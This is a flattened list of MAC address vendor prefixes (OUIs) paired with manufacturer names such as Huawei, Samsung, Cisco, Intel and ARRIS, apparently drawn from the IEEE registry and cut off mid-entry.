HUAWEI TECHNOLOGIES CO.,LTD 307496 HUAWEI TECHNOLOGIES CO.,LTD 708A09 HUAWEI TECHNOLOGIES CO.,LTD 506B8D Nutanix 0038DF Cisco Systems, Inc CCC5EF Co-Comm Servicios Telecomunicaciones S.L. 9002A9 Zhejiang Dahua Technology Co., Ltd. C0288D Logitech, Inc 000B2E Cal-Comp Electronics & Communications Company Ltd. 4865EE IEEE Registration Authority 64DB43 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 000E58 Sonos, Inc. 7C2634 ARRIS Group, Inc. 40F413 Rubezh F4CAE5 FREEBOX SAS 90004E Hon Hai Precision Ind. Co.,Ltd. 0013A5 General Solutions, LTD. 00FD45 Hewlett Packard Enterprise F074E4 Thundercomm Technology Co., Ltd A0722C HUMAX Co., Ltd. B04BBF PT HAN SUNG ELECTORONICS INDONESIA FCD848 Apple, Inc. E00DB9 Cree, Inc. 9C3DCF NETGEAR B4D135 Cloudistics D46E0E TP-LINK TECHNOLOGIES CO.,LTD. 88366C EFM Networks 48DA96 Eddy Smart Home Solutions Inc. 248894 shenzhen lensun Communication Technology LTD EC107B Samsung Electronics Co.,Ltd 1C232C Samsung Electronics Co.,Ltd CC2D83 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 0015FF Novatel Wireless Solutions, Inc. 78888A CDR Sp. z o.o. Sp. k. FC83C6 N-Radio Technologies Co., Ltd. DC0D30 Shenzhen Feasycom Technology Co., Ltd. F0ACD7 IEEE Registration Authority 9495A0 Google, Inc. 00A6CA Cisco Systems, Inc F02FA7 HUAWEI TECHNOLOGIES CO.,LTD 18DED7 HUAWEI TECHNOLOGIES CO.,LTD C83DD4 CyberTAN Technology Inc. E0B94D SHENZHEN BILIAN ELECTRONIC CO.,LTD 38D547 ASUSTek COMPUTER INC. 1C9D3E Integrated Device Technology (Malaysia) Sdn. Bhd. 0021D2 Samsung Electronics Co.,Ltd 0021D1 Samsung Electronics Co.,Ltd 001FCC Samsung Electronics Co.,Ltd A42983 Boeing Defence Australia EC8892 Motorola Mobility LLC, a Lenovo Company 004A77 zte corporation D41D71 Palo Alto Networks 008731 Cisco Systems, Inc 88DEA9 Roku, Inc. D8452B Integrated Device Technology (Malaysia) Sdn. Bhd. E4186B Zyxel Communications Corporation 60A10A Samsung Electronics Co.,Ltd 8C71F8 Samsung Electronics Co.,Ltd CC051B Samsung Electronics Co.,Ltd 8C7712 Samsung Electronics Co.,Ltd 9463D1 Samsung Electronics Co.,Ltd 503F98 CMITECH 5C497D Samsung Electronics Co.,Ltd 98234E Micromedia AG 782079 ID Tech 7487A9 OCT Technology Co., Ltd. 00749C Ruijie Networks Co.,LTD 78D6F0 SAMSUNG ELECTRO MECHANICS CO., LTD. 7825AD Samsung Electronics Co.,Ltd ECE09B Samsung Electronics Co.,Ltd 0C6076 Hon Hai Precision Ind. Co.,Ltd. 0CEEE6 Hon Hai Precision Ind. Co.,Ltd. E4D53D Hon Hai Precision Ind. Co.,Ltd. C0143D Hon Hai Precision Ind. Co.,Ltd. C01885 Hon Hai Precision Ind. Co.,Ltd. 5894CF Vertex Standard LMR, Inc. 20F85E Delta Electronics 0023E4 IPnect co. ltd. 70D4F2 RIM 7C11CB HUAWEI TECHNOLOGIES CO.,LTD 240DC2 TCT mobile ltd C0BDD1 SAMSUNG ELECTRO-MECHANICS(THAILAND) B479A7 SAMSUNG ELECTRO-MECHANICS(THAILAND) BC20A4 Samsung Electronics Co.,Ltd 08D42B Samsung Electronics Co.,Ltd 789ED0 Samsung Electronics Co.,Ltd B0C4E7 Samsung Electronics Co.,Ltd C81479 Samsung Electronics Co.,Ltd 1CAF05 Samsung Electronics Co.,Ltd 002490 Samsung Electronics Co.,Ltd 0023D7 Samsung Electronics Co.,Ltd 549B12 Samsung Electronics Co.,Ltd FCA13E Samsung Electronics Co.,Ltd A00798 Samsung Electronics Co.,Ltd 001FCD Samsung Electronics Co.,Ltd 20D5BF Samsung Electronics Co.,Ltd 0016DB Samsung Electronics Co.,Ltd 001EE2 Samsung Electronics Co.,Ltd 24C696 Samsung Electronics Co.,Ltd 94D771 Samsung Electronics Co.,Ltd E84E84 Samsung Electronics Co.,Ltd B0DF3A Samsung Electronics Co.,Ltd 805719 Samsung Electronics Co.,Ltd 001632 Samsung Electronics Co.,Ltd E4E0C5 Samsung Electronics Co.,Ltd 38ECE4 Samsung Electronics Co.,Ltd 945103 Samsung Electronics Co.,Ltd 5CE8EB Samsung Electronics Co.,Ltd 34BE00 Samsung Electronics Co.,Ltd 78521A Samsung Electronics Co.,Ltd 04FEA1 Fihonest communication co.,Ltd EC8CA2 Ruckus Wireless B80018 Htel 7472B0 Guangzhou Shiyuan Electronics Co., Ltd. DC1A01 Ecoliv Technology ( Shenzhen ) Ltd. A043DB Sitael S.p.A. E0E7BB Nureva, Inc. 1C25E1 China Mobile IOT Company Limited C0F636 Hangzhou Kuaiyue Technologies, Ltd. 546C0E Texas Instruments EC8EAE Nagravision SA 001A22 eQ-3 Entwicklung GmbH 20BBC6 Jabil Circuit Hungary Ltd. 001CC3 ARRIS Group, Inc. 7085C6 ARRIS Group, Inc. 54E2E0 ARRIS Group, Inc. 347A60 ARRIS Group, Inc. 001087 XSTREAMIS PLC 00B0B3 XSTREAMIS PLC 002363 Zhuhai Raysharp Technology Co.,Ltd D84710 Sichuan Changhong Electric Ltd. 001972 Plexus (Xiamen) Co.,ltd. 049FCA HUAWEI TECHNOLOGIES CO.,LTD 50016B HUAWEI TECHNOLOGIES CO.,LTD 009058 Ultra Electronics Command & Control Systems 001CFD Universal Electronics, Inc. 002347 ProCurve Networking by HP 0024A8 ProCurve Networking by HP C09134 ProCurve Networking by HP 001CEF Primax Electronics Ltd. 000276 Primax Electronics Ltd. 4CB21C Maxphotonics Co.,Ltd 205EF7 Samsung Electronics Co.,Ltd 141F78 Samsung Electronics Co.,Ltd AC482D Ralinwi Nanjing Electronic Technology Co., Ltd. 00549F Avaya Inc 080087 Xyplex, Inc. 00140E Nortel Networks 001E1F Nortel Networks 00001B Novell, Inc. 0004DC Nortel Networks 000CF7 Nortel Networks 000FCD Nortel Networks 001BBA Nortel Networks 001969 Nortel Networks 0018B0 Nortel Networks 0016CA Nortel Networks 6CB9C5 Delta Networks, Inc. 0028F8 Intel Corporate 58BC8F Cognitive Systems Corp. D455BE SHENZHEN FAST TECHNOLOGIES CO.,LTD 640DCE SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 54D272 Nuki Home Solutions GmbH 2824FF Wistron Neweb Corporation 38256B Microsoft Mobile Oy 203AEF Sivantos GmbH 005979 Networked Energy Services 207C8F Quanta Microsystems,Inc. 44DC91 PLANEX COMMUNICATIONS INC. E09DB8 PLANEX COMMUNICATIONS INC. 000F59 Phonak AG 74B57E zte corporation B8BB23 Guangdong Nufront CSC Co., Ltd 34EA34 HangZhou Gubei Electronics Technology Co.,Ltd EC26FB TECC CO.,LTD. 0020F4 SPECTRIX CORPORATION 04EE91 x-fabric GmbH 000B34 ShangHai Broadband Technologies CO.LTD 3092F6 SHANGHAI SUNMON COMMUNICATION TECHNOGY CO.,LTD A8AD3D Alcatel-Lucent Shanghai Bell Co., Ltd 24AF4A Alcatel-Lucent IPD 7C2064 Alcatel-Lucent IPD 48F8E1 Nokia 8C90D3 Nokia 30766F LG Electronics (Mobile Communications) A8922C LG Electronics (Mobile Communications) F80CF3 LG Electronics (Mobile Communications) C44BD1 Wallys Communications Teachnologies Co.,Ltd. 001478 TP-LINK TECHNOLOGIES CO.,LTD. C49A02 LG Electronics (Mobile Communications) 001F6B LG Electronics (Mobile Communications) 0026E2 LG Electronics (Mobile Communications) E8886C Shenzhen SC Technologies Co.,LTD DC35F1 Positivo Tecnologia S.A. 0003B2 Radware 00A0C6 Qualcomm Inc. 649C81 Qualcomm Inc. 0024FF QLogic Corporation 001E21 Qisda Corporation 00039D Qisda Corporation 001A6A Tranzas, Inc. B47443 Samsung Electronics Co.,Ltd FCF647 Fiberhome Telecommunication Technologies Co.,LTD 18686A zte corporation 00C0E4 SIEMENS BUILDING 000D10 Embedtronics Oy 001FA8 Smart Energy Instruments Inc. 000FDB Westell Technologies Inc. 00080D Toshiba 000E7B Toshiba E8E0B7 Toshiba 002186 Universal Global Scientific Industrial Co., Ltd. 183919 Unicoi Systems DC4427 IEEE Registration Authority BC3400 IEEE Registration Authority B808D7 HUAWEI TECHNOLOGIES CO.,LTD 94611E Wata Electronics Co.,Ltd. 3C0771 Sony Corporation 80414E BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 249442 OPEN ROAD SOLUTIONS , INC. C46413 Cisco Systems, Inc 0010CA Telco Systems, Inc. 00E09E Quantum Corporation 000A08 Alps Alpine 206A8A Wistron Infocomm (Zhongshan) Corporation 3CB6B7 vivo Mobile Communication Co., Ltd. C4F1D1 BEIJING SOGOU TECHNOLOGY DEVELOPMENT CO., LTD. A47174 HUAWEI TECHNOLOGIES CO.,LTD F4CB52 HUAWEI TECHNOLOGIES CO.,LTD A020A6 Espressif Inc. 58528A Mitsubishi Electric Corporation 680715 Intel Corporate 001EC0 Microchip Technology Inc. 784476 Zioncom Electronics (Shenzhen) Ltd. 001165 ZNYX Networks, Inc. 000A68 Solarflare Communications Inc. 2C36A0 Capisco Limited B0B2DC Zyxel Communications Corporation CC5D4E Zyxel Communications Corporation 404A03 Zyxel Communications Corporation C86C87 Zyxel Communications Corporation 38BC1A MEIZU Technology Co., Ltd. 340AFF Qingdao Hisense Communications Co.,Ltd. 587E61 Qingdao Hisense Communications Co.,Ltd. C0A1A2 MarqMetrix 08D0B7 Qingdao Hisense Communications Co.,Ltd. ECD68A Shenzhen JMicron Intelligent Technology Developmen 5052D2 Hangzhou Telin Technologies Co., Limited 606453 AOD Co.,Ltd. 6C98EB Riverbed Technology, Inc. 009E1E Cisco Systems, Inc 0C8A87 AgLogica Holdings, Inc 54EDA3 Navdy, Inc. 90EED9 UNIVERSAL DE DESARROLLOS ELECTRÓNICOS, SA 7C574E COBI GmbH 045604 Gionee Communication Equipment Co.,Ltd. C8AFE3 Hefei Radio Communication Technology Co., Ltd 945907 Shanghai HITE-BELDEN Network Technology Co., Ltd. 001848 Vecima Networks Inc. 0016FB SHENZHEN MTC CO LTD 74CC39 Fiberhome Telecommunication Technologies Co.,LTD 00FEC8 Cisco Systems, Inc 00253E Sensus Metering Systems 34A2A2 HUAWEI TECHNOLOGIES CO.,LTD 749D8F HUAWEI TECHNOLOGIES CO.,LTD 2C5A8D SYSTRONIK Elektronik u. Systemtechnik GmbH E47B3F BEIJING CO-CLOUD TECHNOLOGY LTD. 10BEF5 D-Link International A0415E Opsens Solution Inc. 006CBC Cisco Systems, Inc 5C70A3 LG Electronics (Mobile Communications) 3822D6 Hangzhou H3C Technologies Co., Limited 94E8C5 ARRIS Group, Inc. 6C3B6B Routerboard.com A860B6 Apple, Inc. C4B301 Apple, Inc. E05F45 Apple, Inc. 483B38 Apple, Inc. 1C9148 Apple, Inc. B8E779 9Solutions Oy C864C7 zte corporation 0022E7 WPS Parking Systems 4851B7 Intel Corporate 905F2E TCT mobile ltd A4E597 Gessler GmbH A86BAD Hon Hai Precision Ind. Co.,Ltd. D80F99 Hon Hai Precision Ind. Co.,Ltd. B4B15A Siemens AG Energy Management Division 00A0A4 Oracle Corporation 28F366 Shenzhen Bilian electronic CO.,LTD E0A3AC HUAWEI TECHNOLOGIES CO.,LTD BC7574 HUAWEI TECHNOLOGIES CO.,LTD 20A680 HUAWEI TECHNOLOGIES CO.,LTD 8828B3 HUAWEI TECHNOLOGIES CO.,LTD F823B2 HUAWEI TECHNOLOGIES CO.,LTD 341290 Treeview Co.,Ltd. 7CFE4E Shenzhen Safe vision Technology Co.,LTD 644FB0 Hyunjin.com 00E0E6 INCAA Computers 001317 GN Netcom A/S 9CDF03 Harman/Becker Automotive Systems GmbH ECA86B Elitegroup Computer Systems Co.,Ltd. C89CDC Elitegroup Computer Systems Co.,Ltd. 002511 Elitegroup Computer Systems Co.,Ltd. 4487FC Elitegroup Computer Systems Co.,Ltd. 002465 Elentec 00089F EFM Networks 0050FC Edimax Technology Co. Ltd. 0016FA ECI Telecom Ltd. 001188 Enterasys 0001F4 Enterasys 00109B Emulex Corporation 00142A Elitegroup Computer Systems Co.,Ltd. 00115B Elitegroup Computer Systems Co.,Ltd. C03FD5 Elitegroup Computer Systems Co.,Ltd. 749781 zte corporation 001D82 GN Netcom A/S 001D08 Jiangsu Yinhe Electronics Co.,Ltd. E85659 Advanced-Connectek Inc. 30FC68 TP-LINK TECHNOLOGIES CO.,LTD. 008A96 Cisco Systems, Inc A082AC Linear DMS Solutions Sdn. Bhd. A86AC1 HanbitEDS Co., Ltd. D463FE Arcadyan Corporation 689361 Integrated Device Technology (Malaysia) Sdn. Bhd. A0043E Parker Hannifin Manufacturing Germany GmbH & Co. KG BC60A7 Sony Interactive Entertainment Inc. 64CC2E Xiaomi Communications Co Ltd 8801F2 Vitec System Engineering Inc. 4CB8B5 Shenzhen YOUHUA Technology Co., Ltd 001174 Mojo Networks, Inc. 001954 Leaf Corporation. 9466E7 WOM Engineering F8A188 LED Roadway Lighting 34BF90 Fiberhome Telecommunication Technologies Co.,LTD CCB3F8 FUJITSU ISOTEC LIMITED E4A471 Intel Corporate 10F005 Intel Corporate C84529 IMK Networks Co.,Ltd BC15AC Vodafone Italia S.p.A. 00BD82 Shenzhen YOUHUA Technology Co., Ltd 94513D iSmart Alarm, Inc. EC93ED DDoS-Guard LTD 7085C2 ASRock Incorporation 14D11F HUAWEI TECHNOLOGIES CO.,LTD DC094C HUAWEI TECHNOLOGIES CO.,LTD 1C6758 HUAWEI TECHNOLOGIES CO.,LTD 24BCF8 HUAWEI TECHNOLOGIES CO.,LTD DCEE06 HUAWEI TECHNOLOGIES CO.,LTD 0452C7 Bose Corporation F02745 F-Secure Corporation 54D0B4 Xiamen Four-Faith Communication Technology Co.,Ltd 00137C Kaicom co., Ltd. 7C477C IEEE Registration Authority F877B8 Samsung Electronics Co.,Ltd F0D2F1 Amazon Technologies Inc. A8E3EE Sony Interactive Entertainment Inc. 00248D Sony Interactive Entertainment Inc. 00041F Sony Interactive Entertainment Inc. 20A90E TCT mobile ltd 245EBE QNAP Systems, Inc. 0404EA Valens Semiconductor Ltd. 800DD7 Latticework, Inc 441102 EDMI Europe Ltd 980CA5 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. A85EE4 12Sided Technology, LLC 0CA2F4 Chameleon Technology (UK) Limited EC438B YAPTV 4CCC6A Micro-Star INTL CO., LTD. 182195 Samsung Electronics Co.,Ltd 44783E Samsung Electronics Co.,Ltd 00E0E4 FANUC ROBOTICS NORTH AMERICA, Inc. D0B53D SEPRO ROBOTIQUE 00D0EC NAKAYO Inc 14C3C2 K.A. Schmersal GmbH & Co. KG 10785B Actiontec Electronics, Inc 546751 Compal Broadband Networks, Inc. 240B0A Palo Alto Networks D099D5 Alcatel-Lucent 00247D Nokia Danmark A/S 002265 Nokia Danmark A/S BC44B0 Elastifile 74BFB7 Nusoft Corporation 50DA00 Hangzhou H3C Technologies Co., Limited F4ED5F SHENZHEN KTC TECHNOLOGY GROUP 14BB6E Samsung Electronics Co.,Ltd 30636B Apple, Inc. 70884D JAPAN RADIO CO., LTD. 002547 Nokia Danmark A/S 0018C5 Nokia Danmark A/S F4F5A5 Nokia Corporation EC9B5B Nokia Corporation A4F1E8 Apple, Inc. 1886AC Nokia Danmark A/S 001F5C Nokia Danmark A/S 001F00 Nokia Danmark A/S 00164E Nokia Danmark A/S 002668 Nokia Danmark A/S F88096 Elsys Equipamentos Eletrônicos Ltda A811FC ARRIS Group, Inc. 001DAA DrayTek Corp. E498D1 Microsoft Mobile Oy 6C2779 Microsoft Mobile Oy 0CBF15 Genetec Inc. 0040FB CASCADE COMMUNICATIONS D0542D Cambridge Industries(Group) Co.,Ltd. 2CCC15 Nokia Corporation D8FB5E ASKEY COMPUTER CORP 00CF1C Communication Machinery Corporation 28CC01 Samsung Electronics Co.,Ltd 6CF373 Samsung Electronics Co.,Ltd 9C3AAF Samsung Electronics Co.,Ltd 781FDB Samsung Electronics Co.,Ltd 4CA56D Samsung Electronics Co.,Ltd B86CE8 Samsung Electronics Co.,Ltd 0CB319 Samsung Electronics Co.,Ltd 1867B0 Samsung Electronics Co.,Ltd 002326 FUJITSU LIMITED 000D4B Roku, Inc. 183F47 Samsung Electronics Co.,Ltd 50A4C8 Samsung Electronics Co.,Ltd 6C8336 Samsung Electronics Co.,Ltd 0026B6 ASKEY COMPUTER CORP DCD87C Beijing Jingdong Century Trading Co., LTD. C4DA7D Ivium Technologies B.V. 001BA9 Brother industries, LTD. 30A220 ARG Telecom E03E44 Broadcom 001B2F NETGEAR 001F33 NETGEAR 000B6A Asiarock Technology Limited 001B9E ASKEY COMPUTER CORP E0CA94 ASKEY COMPUTER CORP 744AA4 zte corporation 00001D Cabletron Systems, Inc. 00300A Aztech Electronics Pte Ltd 001F3F AVM GmbH 246511 AVM GmbH C0FFD4 NETGEAR 6CB0CE NETGEAR 008EF2 NETGEAR 00264D Arcadyan Technology Corporation 849CA6 Arcadyan Technology Corporation 002557 BlackBerry RTS 001CCC BlackBerry RTS 9CD36D NETGEAR C40415 NETGEAR E8FCAF NETGEAR 841B5E NETGEAR 2CB05D NETGEAR A021B7 NETGEAR 0024B2 NETGEAR 145BD1 ARRIS Group, Inc. 6CC1D2 ARRIS Group, Inc. 74F612 ARRIS Group, Inc. 002495 ARRIS Group, Inc. 0024A0 ARRIS Group, Inc. 3C754A ARRIS Group, Inc. E48399 ARRIS Group, Inc. 002143 ARRIS Group, Inc. 002374 ARRIS Group, Inc. 5C93A2 Liteon Technology Corporation ACE010 Liteon Technology Corporation 747548 Amazon Technologies Inc. 0000B1 Alpha Micro 001802 Alpha Networks Inc. 001CA8 AirTies Wireless Networks 000AD9 Sony Corporation 000E07 Sony Corporation 001E45 Sony Corporation 001CA4 Sony Corporation 001A75 Sony Corporation 78843C Sony Corporation 0023F1 Sony Corporation 24FD52 Liteon Technology Corporation 2CD05A Liteon Technology Corporation 74E543 Liteon Technology Corporation 74DE2B Liteon Technology Corporation 00225F Liteon Technology Corporation E86D52 ARRIS Group, Inc. 0015CF ARRIS Group, Inc. 6CFAA7 AMPAK Technology, Inc. 0013A9 Sony Corporation 94CE2C Sony Corporation FC0FE6 Sony Interactive Entertainment Inc. 00080E ARRIS Group, Inc. 00909C ARRIS Group, Inc. 001225 ARRIS Group, Inc. 002040 ARRIS Group, Inc. 386BBB ARRIS Group, Inc. 001C11 ARRIS Group, Inc. 001E46 ARRIS Group, Inc. 0018A4 ARRIS Group, Inc. 0018C0 ARRIS Group, Inc. 1C1448 ARRIS Group, Inc. 001784 ARRIS Group, Inc. 74C63B AzureWave Technology Inc. 900BC1 Sprocomm Technologies CO.,Ltd ACE5F0 Doppler Labs C40938 FUJIAN STAR-NET COMMUNICATION CO.,LTD 001C50 TCL Technoly Electronics (Huizhou) Co., Ltd. 00AA02 Intel Corporation 7C7A91 Intel Corporate AC7BA1 Intel Corporate 6C2995 Intel Corporate 984FEE Intel Corporate E82AEA Intel Corporate 28C2DD AzureWave Technology Inc. 80A589 AzureWave Technology Inc. 54E4BD FN-LINK TECHNOLOGY LIMITED 5414FD Orbbec 3D Technology International 485D60 AzureWave Technology Inc. DC85DE AzureWave Technology Inc. B0EE45 AzureWave Technology Inc. 54271E AzureWave Technology Inc. F0842F ADB Broadband Italia 0C6AE6 Stanley Security Solutions 00238E ADB Broadband Italia 001D8B ADB Broadband Italia 0013C8 ADB Broadband Italia DC0B1A ADB Broadband Italia 842615 ADB Broadband Italia 605718 Intel Corporate C4D987 Intel Corporate 8C705A Intel Corporate 606720 Intel Corporate 044E06 Ericsson AB 00D09E 2Wire Inc 0019E4 2Wire Inc 001AC4 2Wire Inc 001B5B 2Wire Inc 001EC7 2Wire Inc 002650 2Wire Inc E0757D Motorola Mobility LLC, a Lenovo Company 34BB26 Motorola Mobility LLC, a Lenovo Company 806C1B Motorola Mobility LLC, a Lenovo Company 348446 Ericsson AB 0016EB Intel Corporate 0018DE Intel Corporate 5CE0C5 Intel Corporate 58A839 Intel Corporate 7C5CF8 Intel Corporate B4E1C4 Microsoft Mobile Oy 002351 2Wire Inc 3CEA4F 2Wire Inc DC7FA4 2Wire Inc B0D5CC Texas Instruments 3829DD ONvocal Inc DC6DCD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C4282D Embedded Intellect Pty Ltd 00270E Intel Corporate A088B4 Intel Corporate 648099 Intel Corporate D07E35 Intel Corporate 001E65 Intel Corporate 001E67 Intel Corporate 0022FA Intel Corporate 001500 Intel Corporate FCF8AE Intel Corporate 6036DD Intel Corporate 100BA9 Intel Corporate 800A80 IEEE Registration Authority CC33BB Sagemcom Broadband SAS 3CA348 vivo Mobile Communication Co., Ltd. E45AA2 vivo Mobile Communication Co., Ltd. CC3B3E Lester Electrical 1CBA8C Texas Instruments 205532 Gotech International Technology Limited 2CFF65 Oki Electric Industry Co., Ltd. 2C27D7 Hewlett Packard D86CE9 Sagemcom Broadband SAS E8F1B0 Sagemcom Broadband SAS 2082C0 Xiaomi Communications Co Ltd 00173F Belkin International Inc. 001CDF Belkin International Inc. C05627 Belkin International Inc. 5846E1 Baxter International Inc 984BE1 Hewlett Packard 0015E9 D-Link Corporation 001B11 D-Link Corporation 5C6B32 Texas Instruments 84DD20 Texas Instruments 0017E5 Texas Instruments 0017EC Texas Instruments 0017E7 Texas Instruments 0017E9 Texas Instruments 4C17EB Sagemcom Broadband SAS 001831 Texas Instruments 70CA4D Shenzhen lnovance Technology Co.,Ltd. 006037 NXP Semiconductors DCC0EB ASSA ABLOY CÔTE PICARDE C8478C Beken Corporation A4BA76 HUAWEI TECHNOLOGIES CO.,LTD 0050C2 IEEE Registration Authority 440010 Apple, Inc. 0056CD Apple, Inc. 00CDFE Apple, Inc. 24FD5B SmartThings, Inc. 2876CD Funshion Online Technologies Co.,Ltd A0F895 Shenzhen TINNO Mobile Technology Corp. 0078CD Ignition Design Labs 48DB50 HUAWEI TECHNOLOGIES CO.,LTD 002926 Applied Optoelectronics, Inc Taiwan Branch 24BA13 RISO KAGAKU CORPORATION 001A11 Google, Inc. 28BC56 EMAC, Inc. B436A9 Fibocom Wireless Inc. 00265A D-Link Corporation C8BE19 D-Link International BC0F64 Intel Corporate E4FAFD Intel Corporate 94659C Intel Corporate 484520 Intel Corporate C80E77 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited 9C3426 ARRIS Group, Inc. 2C6E85 Intel Corporate E498D6 Apple, Inc. 9CEFD5 Panda Wireless, Inc. 001DD1 ARRIS Group, Inc. 001DCF ARRIS Group, Inc. 001DD5 ARRIS Group, Inc. 001DD4 ARRIS Group, Inc. CCA462 ARRIS Group, Inc. 001320 Intel Corporate 9049FA Intel Corporate 106F3F BUFFALO.INC B0C745 BUFFALO.INC D8D385 Hewlett Packard 18A905 Hewlett Packard 44E137 ARRIS Group, Inc. 0000C5 ARRIS Group, Inc. 6455B1 ARRIS Group, Inc. 0002B3 Intel Corporation 000347 Intel Corporation 000E0C Intel Corporation 001B78 Hewlett Packard 001871 Hewlett Packard 000E7F Hewlett Packard 001185 Hewlett Packard 001279 Hewlett Packard 001321 Hewlett Packard 14CFE2 ARRIS Group, Inc. 00234D Hon Hai Precision Ind. Co.,Ltd. 002556 Hon Hai Precision Ind. Co.,Ltd. 601888 zte corporation D860B0 bioMérieux Italia S.p.A. D8FC38 Giantec Semiconductor Inc AC2A0C CSR ZHUZHOU INSTITUTE CO.,LTD. 2C6798 InTalTech Ltd. F431C3 Apple, Inc. 64A5C3 Apple, Inc. 0019E0 TP-LINK TECHNOLOGIES CO.,LTD. 002586 TP-LINK TECHNOLOGIES CO.,LTD. F8DB7F HTC Corporation 64A769 HTC Corporation E899C4 HTC Corporation BCCFCC HTC Corporation 28565A Hon Hai Precision Ind. Co.,Ltd. 6CB56B HUMAX Co., Ltd. D81FCC Brocade Communications Systems LLC 847778 Cochlear Limited 887F03 Comper Technology Investment Limited 10604B Hewlett Packard C8CBB8 Hewlett Packard 843497 Hewlett Packard 0004EA Hewlett Packard 0080E1 STMicroelectronics SRL 000802 Hewlett Packard 0002A5 Hewlett Packard 6CC217 Hewlett Packard 1458D0 Hewlett Packard 5C8A38 Hewlett Packard 2C59E5 Hewlett Packard EC9A74 Hewlett Packard E422A5 PLANTRONICS, INC. D4C9B2 Quanergy Systems Inc 6021C0 Murata Manufacturing Co., Ltd. 88308A Murata Manufacturing Co., Ltd. 5CDAD4 Murata Manufacturing Co., Ltd. 0026E8 Murata Manufacturing Co., Ltd. 54E6FC TP-LINK TECHNOLOGIES CO.,LTD. 74EA3A TP-LINK TECHNOLOGIES CO.,LTD. F81A67 TP-LINK TECHNOLOGIES CO.,LTD. EC172F TP-LINK TECHNOLOGIES CO.,LTD. 14E6E4 TP-LINK TECHNOLOGIES CO.,LTD. BC25E0 HUAWEI TECHNOLOGIES CO.,LTD F4E3FB HUAWEI TECHNOLOGIES CO.,LTD D02DB3 HUAWEI TECHNOLOGIES CO.,LTD E8CD2D HUAWEI TECHNOLOGIES CO.,LTD 002268 Hon Hai Precision Ind. Co.,Ltd. BC3AEA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 002438 Brocade Communications Systems LLC 0014C9 Brocade Communications Systems LLC 344B50 zte corporation FCC897 zte corporation 002512 zte corporation 001C26 Hon Hai Precision Ind. Co.,Ltd. 0016CE Hon Hai Precision Ind. Co.,Ltd. 300ED5 Hon Hai Precision Ind. Co.,Ltd. 485AB6 Hon Hai Precision Ind. Co.,Ltd. 543530 Hon Hai Precision Ind. Co.,Ltd. F866D1 Hon Hai Precision Ind. Co.,Ltd. E8088B HUAWEI TECHNOLOGIES CO.,LTD 0C96BF HUAWEI TECHNOLOGIES CO.,LTD 60E701 HUAWEI TECHNOLOGIES CO.,LTD 90671C HUAWEI TECHNOLOGIES CO.,LTD 50EB1A Brocade Communications Systems LLC 0027F8 Brocade Communications Systems LLC 748EF8 Brocade Communications Systems LLC 9C99A0 Xiaomi Communications Co Ltd 584498 Xiaomi Communications Co Ltd 70E422 Cisco Systems, Inc 00500F Cisco Systems, Inc 0050A2 Cisco Systems, Inc 1C1D67 HUAWEI TECHNOLOGIES CO.,LTD 84A8E4 HUAWEI TECHNOLOGIES CO.,LTD 001882 HUAWEI TECHNOLOGIES CO.,LTD D4EA0E Avaya Inc 6CFA58 Avaya Inc 7C6097 HUAWEI TECHNOLOGIES CO.,LTD CC53B5 HUAWEI TECHNOLOGIES CO.,LTD 60DE44 HUAWEI TECHNOLOGIES CO.,LTD 105172 HUAWEI TECHNOLOGIES CO.,LTD 08E84F HUAWEI TECHNOLOGIES CO.,LTD 643E8C HUAWEI TECHNOLOGIES CO.,LTD 0012D2 Texas Instruments 2469A5 HUAWEI TECHNOLOGIES CO.,LTD EC233D HUAWEI TECHNOLOGIES CO.,LTD 78F5FD HUAWEI TECHNOLOGIES CO.,LTD 5C7D5E HUAWEI TECHNOLOGIES CO.,LTD 20F3A3 HUAWEI TECHNOLOGIES CO.,LTD 0C37DC HUAWEI TECHNOLOGIES CO.,LTD BC7670 HUAWEI TECHNOLOGIES CO.,LTD 24DBAC HUAWEI TECHNOLOGIES CO.,LTD A051C6 Avaya Inc F0EBD0 Shanghai Feixun Communication Co.,Ltd. 888603 HUAWEI TECHNOLOGIES CO.,LTD 04F938 HUAWEI TECHNOLOGIES CO.,LTD AC853D HUAWEI TECHNOLOGIES CO.,LTD 4846FB HUAWEI TECHNOLOGIES CO.,LTD E0247F HUAWEI TECHNOLOGIES CO.,LTD 00464B HUAWEI TECHNOLOGIES CO.,LTD 80FB06 HUAWEI TECHNOLOGIES CO.,LTD A863F2 Texas Instruments D0FF50 Texas Instruments 20C38F Texas Instruments 7C669D Texas Instruments D8DDFD Texas Instruments D05FB8 Texas Instruments 84EB18 Texas Instruments 7C1DD9 Xiaomi Communications Co Ltd A086C6 Xiaomi Communications Co Ltd 6CA849 Avaya Inc 64C354 Avaya Inc 50CD22 Avaya Inc B4A95A Avaya Inc 581626 Avaya Inc C08C60 Cisco Systems, Inc E8EDF3 Cisco Systems, Inc E4C722 Cisco Systems, Inc 64E950 Cisco Systems, Inc C07BBC Cisco Systems, Inc 24E9B3 Cisco Systems, Inc 00E0F9 Cisco Systems, Inc C8D719 Cisco-Linksys, LLC 203A07 Cisco Systems, Inc 000E08 Cisco-Linksys, LLC 00603E Cisco Systems, Inc 00602F Cisco Systems, Inc 7CAD74 Cisco Systems, Inc F41FC2 Cisco Systems, Inc 44ADD9 Cisco Systems, Inc 0C6803 Cisco Systems, Inc 0011D8 ASUSTek COMPUTER INC. 0018F3 ASUSTek COMPUTER INC. 001A92 ASUSTek COMPUTER INC. 14DAE9 ASUSTek COMPUTER INC. 006047 Cisco Systems, Inc 00E0B0 Cisco Systems, Inc 00E0FE Cisco Systems, Inc 00E034 Cisco Systems, Inc 00023D Cisco Systems, Inc 00502A Cisco Systems, Inc 4403A7 Cisco Systems, Inc B0FAEB Cisco Systems, Inc 001079 Cisco Systems, Inc 001029 Cisco Systems, Inc 44E08E Cisco SPVTG BCC810 Cisco SPVTG 7CB21B Cisco SPVTG 24767D Cisco SPVTG 481D70 Cisco SPVTG 00E036 PIONEER CORPORATION 00E04F Cisco Systems, Inc 0010FF Cisco Systems, Inc 001054 Cisco Systems, Inc 88908D Cisco Systems, Inc F07816 Cisco Systems, Inc 00223A Cisco SPVTG 0021BE Cisco SPVTG 000C41 Cisco-Linksys, LLC 0016B6 Cisco-Linksys, LLC 0018F8 